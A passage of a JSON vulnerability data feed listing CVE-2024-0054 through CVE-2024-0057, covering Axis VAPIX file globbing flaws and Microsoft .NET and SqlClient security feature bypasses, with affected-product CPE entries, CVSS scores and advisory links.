"cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 3.3, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2025-03-27T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0054", "ASSIGNER" : "product-security@axis.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.axis.com/dam/public/76/f3/1d/cve-2024-0054-en-US-432116.pdf", "name" : "https://www.axis.com/dam/public/76/f3/1d/cve-2024-0054-en-US-432116.pdf", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.axis.com/dam/public/76/f3/1d/cve-2024-0054-en-US-432116.pdf", "name" : "https://www.axis.com/dam/public/76/f3/1d/cve-2024-0054-en-US-432116.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX APIs local_list.cgi, create_overlay.cgi and irissetup.cgi was vulnerable for file globbing which could lead to a resource exhaustion attack. Axis has released patched AXIS OS\nversions for the highlighted flaw. Please refer to the Axis security advisory\nfor more information and solution." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-19T07:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0055", "ASSIGNER" : "product-security@axis.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.axis.com/dam/public/c4/00/c5/cve-2024-0055-en-US-432117.pdf", "name" : "https://www.axis.com/dam/public/c4/00/c5/cve-2024-0055-en-US-432117.pdf", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.axis.com/dam/public/c4/00/c5/cve-2024-0055-en-US-432117.pdf", "name" : "https://www.axis.com/dam/public/c4/00/c5/cve-2024-0055-en-US-432117.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX APIs mediaclip.cgi and playclip.cgi was vulnerable for file globbing which could lead to a resource exhaustion attack. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-19T07:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0056", "ASSIGNER" : "secure@microsoft.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0056", "name" : "Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0056", "name" : "Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:sql_server:2022:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:visual_studio_2022:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.2", "versionEndExcluding" : "17.2.23", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:visual_studio_2022:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.4", "versionEndExcluding" : "17.4.15", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:visual_studio_2022:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.6", "versionEndExcluding" : "17.6.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:visual_studio_2022:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.8", "versionEndExcluding" : "17.8.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:microsoft.data.sqlclient:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2.1", "versionEndExcluding" : "2.1.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:microsoft.data.sqlclient:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.1", "versionEndExcluding" : "3.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:microsoft.data.sqlclient:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.0", "versionEndExcluding" : "4.0.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:microsoft.data.sqlclient:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.1", "versionEndExcluding" : "5.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:system.data.sqlclient:*:*:*:*:*:*:*:*", "versionEndExcluding" : "4.8.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:sql_server:2022:cumulative_update_10:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.8", "versionEndExcluding" : "4.8.04690.02", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.8", "versionEndExcluding" : "4.8.04690.01", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.7.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.8.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_21h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_21h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_22h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_22h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_23h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_23h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2022_23h2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.8", "versionEndExcluding" : "4.8.04690.02", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_21h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_21h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_22h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_22h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2022_23h2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:2.0:sp2:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net:*:*:*:*:*:*:*:*", "versionStartIncluding" : "7.0.0", "versionEndExcluding" : "7.0.15", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.0.0", "versionEndExcluding" : "6.0.26", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net:8.0.0:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 8.7, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.2, "impactScore" : 5.8 } }, "publishedDate" : "2024-01-09T18:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0057", "ASSIGNER" : "secure@microsoft.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0057", "name" : "NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0057", "name" : "NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240208-0007/", "name" : "https://security.netapp.com/advisory/ntap-20240208-0007/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:visual_studio_2022:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.2", "versionEndExcluding" : "17.2.23", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:visual_studio_2022:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.4", "versionEndExcluding" : "17.4.15", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:visual_studio_2022:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.6", "versionEndExcluding" : "17.6.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:visual_studio_2022:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.8", "versionEndExcluding" : "17.8.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:powershell:*:*:*:*:*:*:*:*", "versionStartIncluding" : "7.2", "versionEndExcluding" : "7.2.18", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:powershell:7.4:-:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:powershell:*:*:*:*:*:*:*:*", "versionStartIncluding" : "7.3", "versionEndExcluding" : "7.3.11", "cpe_name" : [ ] } ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.8", "versionEndExcluding" : "4.8.04690.02", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.8", "versionEndExcluding" : "4.8.04690.01", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.7.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.8.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_21h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_21h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_22h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_22h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_23h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_23h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2022_23h2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.8", "versionEndExcluding" : "4.8.04690.02", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_21h2:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : 